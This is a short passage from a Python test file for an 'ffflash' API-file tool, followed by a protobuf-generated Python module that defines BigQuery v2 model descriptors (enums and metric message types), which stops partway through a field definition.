assert loads(apifile.read_text('utf-8')) == {'a': 'c'}
assert tmpdir.remove() is None
def test_ffflash_save_check_timestamp(tmpdir, fffake):
apifile = tmpdir.join('phony_api_file.json')
apifile.write_text(dumps({'state': {'lastchange': 'never'}}), 'utf-8')
assert tmpdir.listdir() == [apifile]
f = fffake(apifile, dry=True)
assert f
assert f.api is not None
old_t = f.api.pull('state', 'lastchange')
assert loads(f.save()) == f.api.c
new_t = f.api.pull('state', 'lastchange')
assert old_t != new_t
assert loads(
apifile.read_text('utf-8')
) == {'state': {'lastchange': new_t}}
assert tmpdir.remove() is None
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/bigquery_v2/proto/model.proto
import sys
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.cloud.bigquery_v2.proto import (
model_reference_pb2 as google_dot_cloud_dot_bigquery__v2_dot_proto_dot_model__reference__pb2,
)
from google.cloud.bigquery_v2.proto import (
standard_sql_pb2 as google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/bigquery_v2/proto/model.proto",
package="google.cloud.bigquery.v2",
syntax="proto3",
serialized_options=_b(
"\n\034com.google.cloud.bigquery.v2B\nModelProtoZ@google.golang.org/genproto/googleapis/cloud/bigquery/v2;bigquery"
),
serialized_pb=_b(
'\n*google/cloud/bigquery_v2/proto/model.proto\x12\x18google.cloud.bigquery.v2\x1a\x34google/cloud/bigquery_v2/proto/model_reference.proto\x1a\x31google/cloud/bigquery_v2/proto/standard_sql.proto\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto"\xc4,\n\x05Model\x12\x0c\n\x04\x65tag\x18\x01 \x01(\t\x12\x41\n\x0fmodel_reference\x18\x02 \x01(\x0b\x32(.google.cloud.bigquery.v2.ModelReference\x12\x15\n\rcreation_time\x18\x05 \x01(\x03\x12\x1a\n\x12last_modified_time\x18\x06 \x01(\x03\x12\x13\n\x0b\x64\x65scription\x18\x0c \x01(\t\x12\x15\n\rfriendly_name\x18\x0e \x01(\t\x12;\n\x06labels\x18\x0f \x03(\x0b\x32+.google.cloud.bigquery.v2.Model.LabelsEntry\x12\x17\n\x0f\x65xpiration_time\x18\x10 \x01(\x03\x12\x10\n\x08location\x18\r \x01(\t\x12=\n\nmodel_type\x18\x07 \x01(\x0e\x32).google.cloud.bigquery.v2.Model.ModelType\x12\x42\n\rtraining_runs\x18\t \x03(\x0b\x32+.google.cloud.bigquery.v2.Model.TrainingRun\x12\x43\n\x0f\x66\x65\x61ture_columns\x18\n \x03(\x0b\x32*.google.cloud.bigquery.v2.StandardSqlField\x12\x41\n\rlabel_columns\x18\x0b \x03(\x0b\x32*.google.cloud.bigquery.v2.StandardSqlField\x1a\xb4\x02\n\x11RegressionMetrics\x12\x39\n\x13mean_absolute_error\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x38\n\x12mean_squared_error\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12<\n\x16mean_squared_log_error\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12;\n\x15median_absolute_error\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12/\n\tr_squared\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\xef\x02\n\x1e\x41ggregateClassificationMetrics\x12/\n\tprecision\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12,\n\x06recall\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x61\x63\x63uracy\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12/\n\tthreshold\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x66\x31_score\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08log_loss\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12-\n\x07roc_auc\x18\x07 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\x9f\x06\n\x1b\x42inaryClassificationMetrics\x12h\n aggregate_classification_metrics\x18\x01 \x01(\x0b\x32>.google.cloud.bigquery.v2.Model.AggregateClassificationMetrics\x12w\n\x1c\x62inary_confusion_matrix_list\x18\x02 \x03(\x0b\x32Q.google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix\x12\x16\n\x0epositive_label\x18\x03 \x01(\t\x12\x16\n\x0enegative_label\x18\x04 \x01(\t\x1a\xec\x03\n\x15\x42inaryConfusionMatrix\x12>\n\x18positive_class_threshold\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x33\n\x0etrue_positives\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0f\x66\x61lse_positives\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0etrue_negatives\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0f\x66\x61lse_negatives\x18\x05 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\tprecision\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12,\n\x06recall\x18\x07 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x66\x31_score\x18\x08 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\x08\x61\x63\x63uracy\x18\t \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\x87\x05\n\x1fMultiClassClassificationMetrics\x12h\n aggregate_classification_metrics\x18\x01 
\x01(\x0b\x32>.google.cloud.bigquery.v2.Model.AggregateClassificationMetrics\x12n\n\x15\x63onfusion_matrix_list\x18\x02 \x03(\x0b\x32O.google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix\x1a\x89\x03\n\x0f\x43onfusionMatrix\x12:\n\x14\x63onfidence_threshold\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x61\n\x04rows\x18\x02 \x03(\x0b\x32S.google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row\x1aQ\n\x05\x45ntry\x12\x17\n\x0fpredicted_label\x18\x01 \x01(\t\x12/\n\nitem_count\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x1a\x83\x01\n\x03Row\x12\x14\n\x0c\x61\x63tual_label\x18\x01 \x01(\t\x12\x66\n\x07\x65ntries\x18\x02 \x03(\x0b\x32U.google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry\x1a\x8c\x01\n\x11\x43lusteringMetrics\x12:\n\x14\x64\x61vies_bouldin_index\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12;\n\x15mean_squared_distance\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x1a\x95\x03\n\x11\x45valuationMetrics\x12O\n\x12regression_metrics\x18\x01 \x01(\x0b\x32\x31.google.cloud.bigquery.v2.Model.RegressionMetricsH\x00\x12\x64\n\x1d\x62inary_classification_metrics\x18\x02 \x01(\x0b\x32;.google.cloud.bigquery.v2.Model.BinaryClassificationMetricsH\x00\x12m\n"multi_class_classification_metrics\x18\x03 \x01(\x0b\x32?.google.cloud.bigquery.v2.Model.MultiClassClassificationMetricsH\x00\x12O\n\x12\x63lustering_metrics\x18\x04 \x01(\x0b\x32\x31.google.cloud.bigquery.v2.Model.ClusteringMetricsH\x00\x42\t\n\x07metrics\x1a\x97\x0e\n\x0bTrainingRun\x12U\n\x10training_options\x18\x01 \x01(\x0b\x32;.google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions\x12.\n\nstart_time\x18\x08 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12L\n\x07results\x18\x06 \x03(\x0b\x32;.google.cloud.bigquery.v2.Model.TrainingRun.IterationResult\x12M\n\x12\x65valuation_metrics\x18\x07 \x01(\x0b\x32\x31.google.cloud.bigquery.v2.Model.EvaluationMetrics\x1a\x89\x08\n\x0fTrainingOptions\x12\x16\n\x0emax_iterations\x18\x01 \x01(\x03\x12;\n\tloss_type\x18\x02 \x01(\x0e\x32(.google.cloud.bigquery.v2.Model.LossType\x12\x12\n\nlearn_rate\x18\x03 \x01(\x01\x12\x37\n\x11l1_regularization\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x37\n\x11l2_regularization\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12;\n\x15min_relative_progress\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12.\n\nwarm_start\x18\x07 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12.\n\nearly_stop\x18\x08 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x1b\n\x13input_label_columns\x18\t \x03(\t\x12J\n\x11\x64\x61ta_split_method\x18\n \x01(\x0e\x32/.google.cloud.bigquery.v2.Model.DataSplitMethod\x12 \n\x18\x64\x61ta_split_eval_fraction\x18\x0b \x01(\x01\x12\x19\n\x11\x64\x61ta_split_column\x18\x0c \x01(\t\x12N\n\x13learn_rate_strategy\x18\r \x01(\x0e\x32\x31.google.cloud.bigquery.v2.Model.LearnRateStrategy\x12\x1a\n\x12initial_learn_rate\x18\x10 \x01(\x01\x12o\n\x13label_class_weights\x18\x11 \x03(\x0b\x32R.google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry\x12\x43\n\rdistance_type\x18\x14 \x01(\x0e\x32,.google.cloud.bigquery.v2.Model.DistanceType\x12\x14\n\x0cnum_clusters\x18\x15 \x01(\x03\x12\x11\n\tmodel_uri\x18\x16 \x01(\t\x12S\n\x15optimization_strategy\x18\x17 \x01(\x0e\x32\x34.google.cloud.bigquery.v2.Model.OptimizationStrategy\x1a\x38\n\x16LabelClassWeightsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 
\x01(\x01:\x02\x38\x01\x1a\xd7\x03\n\x0fIterationResult\x12*\n\x05index\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12\x30\n\x0b\x64uration_ms\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\rtraining_loss\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12/\n\teval_loss\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x12\n\nlearn_rate\x18\x07 \x01(\x01\x12^\n\rcluster_infos\x18\x08 \x03(\x0b\x32G.google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo\x1a\x8b\x01\n\x0b\x43lusterInfo\x12\x13\n\x0b\x63\x65ntroid_id\x18\x01 \x01(\x03\x12\x34\n\x0e\x63luster_radius\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x31\n\x0c\x63luster_size\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01"s\n\tModelType\x12\x1a\n\x16MODEL_TYPE_UNSPECIFIED\x10\x00\x12\x15\n\x11LINEAR_REGRESSION\x10\x01\x12\x17\n\x13LOGISTIC_REGRESSION\x10\x02\x12\n\n\x06KMEANS\x10\x03\x12\x0e\n\nTENSORFLOW\x10\x06"O\n\x08LossType\x12\x19\n\x15LOSS_TYPE_UNSPECIFIED\x10\x00\x12\x15\n\x11MEAN_SQUARED_LOSS\x10\x01\x12\x11\n\rMEAN_LOG_LOSS\x10\x02"H\n\x0c\x44istanceType\x12\x1d\n\x19\x44ISTANCE_TYPE_UNSPECIFIED\x10\x00\x12\r\n\tEUCLIDEAN\x10\x01\x12\n\n\x06\x43OSINE\x10\x02"z\n\x0f\x44\x61taSplitMethod\x12!\n\x1d\x44\x41TA_SPLIT_METHOD_UNSPECIFIED\x10\x00\x12\n\n\x06RANDOM\x10\x01\x12\n\n\x06\x43USTOM\x10\x02\x12\x0e\n\nSEQUENTIAL\x10\x03\x12\x0c\n\x08NO_SPLIT\x10\x04\x12\x0e\n\nAUTO_SPLIT\x10\x05"W\n\x11LearnRateStrategy\x12#\n\x1fLEARN_RATE_STRATEGY_UNSPECIFIED\x10\x00\x12\x0f\n\x0bLINE_SEARCH\x10\x01\x12\x0c\n\x08\x43ONSTANT\x10\x02"n\n\x14OptimizationStrategy\x12%\n!OPTIMIZATION_STRATEGY_UNSPECIFIED\x10\x00\x12\x1a\n\x16\x42\x41TCH_GRADIENT_DESCENT\x10\x01\x12\x13\n\x0fNORMAL_EQUATION\x10\x02"K\n\x0fGetModelRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x10\n\x08model_id\x18\x03 \x01(\t"}\n\x11PatchModelRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x10\n\x08model_id\x18\x03 \x01(\t\x12.\n\x05model\x18\x04 \x01(\x0b\x32\x1f.google.cloud.bigquery.v2.Model"N\n\x12\x44\x65leteModelRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x10\n\x08model_id\x18\x03 \x01(\t"\x82\x01\n\x11ListModelsRequest\x12\x12\n\nproject_id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x31\n\x0bmax_results\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.UInt32Value\x12\x12\n\npage_token\x18\x04 \x01(\t"^\n\x12ListModelsResponse\x12/\n\x06models\x18\x01 \x03(\x0b\x32\x1f.google.cloud.bigquery.v2.Model\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t2\xb9\x04\n\x0cModelService\x12X\n\x08GetModel\x12).google.cloud.bigquery.v2.GetModelRequest\x1a\x1f.google.cloud.bigquery.v2.Model"\x00\x12i\n\nListModels\x12+.google.cloud.bigquery.v2.ListModelsRequest\x1a,.google.cloud.bigquery.v2.ListModelsResponse"\x00\x12\\\n\nPatchModel\x12+.google.cloud.bigquery.v2.PatchModelRequest\x1a\x1f.google.cloud.bigquery.v2.Model"\x00\x12U\n\x0b\x44\x65leteModel\x12,.google.cloud.bigquery.v2.DeleteModelRequest\x1a\x16.google.protobuf.Empty"\x00\x1a\xae\x01\xca\x41\x17\x62igquery.googleapis.com\xd2\x41\x90\x01https://www.googleapis.com/auth/bigquery,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/cloud-platform.read-onlyBl\n\x1c\x63om.google.cloud.bigquery.v2B\nModelProtoZ@google.golang.org/genproto/googleapis/cloud/bigquery/v2;bigqueryb\x06proto3'
),
dependencies=[
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_model__reference__pb2.DESCRIPTOR,
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2.DESCRIPTOR,
google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
google_dot_api_dot_client__pb2.DESCRIPTOR,
],
)
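# Enum descriptors for the enums nested inside google.cloud.bigquery.v2.Model
# (ModelType, LossType, DistanceType, DataSplitMethod, LearnRateStrategy,
# OptimizationStrategy); each is registered with the default symbol database.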
_MODEL_MODELTYPE = _descriptor.EnumDescriptor(
name="ModelType",
full_name="google.cloud.bigquery.v2.Model.ModelType",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="MODEL_TYPE_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="LINEAR_REGRESSION",
index=1,
number=1,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="LOGISTIC_REGRESSION",
index=2,
number=2,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="KMEANS", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="TENSORFLOW", index=4, number=6, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5432,
serialized_end=5547,
)
_sym_db.RegisterEnumDescriptor(_MODEL_MODELTYPE)
_MODEL_LOSSTYPE = _descriptor.EnumDescriptor(
name="LossType",
full_name="google.cloud.bigquery.v2.Model.LossType",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="LOSS_TYPE_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="MEAN_SQUARED_LOSS",
index=1,
number=1,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="MEAN_LOG_LOSS", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5549,
serialized_end=5628,
)
_sym_db.RegisterEnumDescriptor(_MODEL_LOSSTYPE)
_MODEL_DISTANCETYPE = _descriptor.EnumDescriptor(
name="DistanceType",
full_name="google.cloud.bigquery.v2.Model.DistanceType",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="DISTANCE_TYPE_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="EUCLIDEAN", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="COSINE", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5630,
serialized_end=5702,
)
_sym_db.RegisterEnumDescriptor(_MODEL_DISTANCETYPE)
_MODEL_DATASPLITMETHOD = _descriptor.EnumDescriptor(
name="DataSplitMethod",
full_name="google.cloud.bigquery.v2.Model.DataSplitMethod",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="DATA_SPLIT_METHOD_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="RANDOM", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="CUSTOM", index=2, number=2, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="SEQUENTIAL", index=3, number=3, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="NO_SPLIT", index=4, number=4, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="AUTO_SPLIT", index=5, number=5, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5704,
serialized_end=5826,
)
_sym_db.RegisterEnumDescriptor(_MODEL_DATASPLITMETHOD)
_MODEL_LEARNRATESTRATEGY = _descriptor.EnumDescriptor(
name="LearnRateStrategy",
full_name="google.cloud.bigquery.v2.Model.LearnRateStrategy",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="LEARN_RATE_STRATEGY_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="LINE_SEARCH", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="CONSTANT", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=5828,
serialized_end=5915,
)
_sym_db.RegisterEnumDescriptor(_MODEL_LEARNRATESTRATEGY)
_MODEL_OPTIMIZATIONSTRATEGY = _descriptor.EnumDescriptor(
name="OptimizationStrategy",
full_name="google.cloud.bigquery.v2.Model.OptimizationStrategy",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="OPTIMIZATION_STRATEGY_UNSPECIFIED",
index=0,
number=0,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="BATCH_GRADIENT_DESCENT",
index=1,
number=1,
serialized_options=None,
type=None,
),
_descriptor.EnumValueDescriptor(
name="NORMAL_EQUATION",
index=2,
number=2,
serialized_options=None,
type=None,
),
],
containing_type=None,
serialized_options=None,
serialized_start=5917,
serialized_end=6027,
)
_sym_db.RegisterEnumDescriptor(_MODEL_OPTIMIZATIONSTRATEGY)
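# Message descriptors for the metric and training-run types nested inside
# Model, starting with RegressionMetrics. Field cross-references
# (message_type, enum_type, containing_type) are left as None here and are
# wired up after all descriptors have been constructed.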
_MODEL_REGRESSIONMETRICS = _descriptor.Descriptor(
name="RegressionMetrics",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="mean_absolute_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.mean_absolute_error",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean_squared_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.mean_squared_error",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mean_squared_log_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.mean_squared_log_error",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="median_absolute_error",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.median_absolute_error",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="r_squared",
full_name="google.cloud.bigquery.v2.Model.RegressionMetrics.r_squared",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=884,
serialized_end=1192,
)
_MODEL_AGGREGATECLASSIFICATIONMETRICS = _descriptor.Descriptor(
name="AggregateClassificationMetrics",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="precision",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.precision",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="recall",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.recall",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="accuracy",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.accuracy",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="threshold",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.threshold",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="f1_score",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.f1_score",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="log_loss",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.log_loss",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="roc_auc",
full_name="google.cloud.bigquery.v2.Model.AggregateClassificationMetrics.roc_auc",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1195,
serialized_end=1562,
)
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX = _descriptor.Descriptor(
name="BinaryConfusionMatrix",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="positive_class_threshold",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.positive_class_threshold",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="true_positives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.true_positives",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="false_positives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.false_positives",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="true_negatives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.true_negatives",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="false_negatives",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.false_negatives",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precision",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.precision",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="recall",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.recall",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="f1_score",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.f1_score",
index=7,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="accuracy",
full_name="google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix.accuracy",
index=8,
number=9,
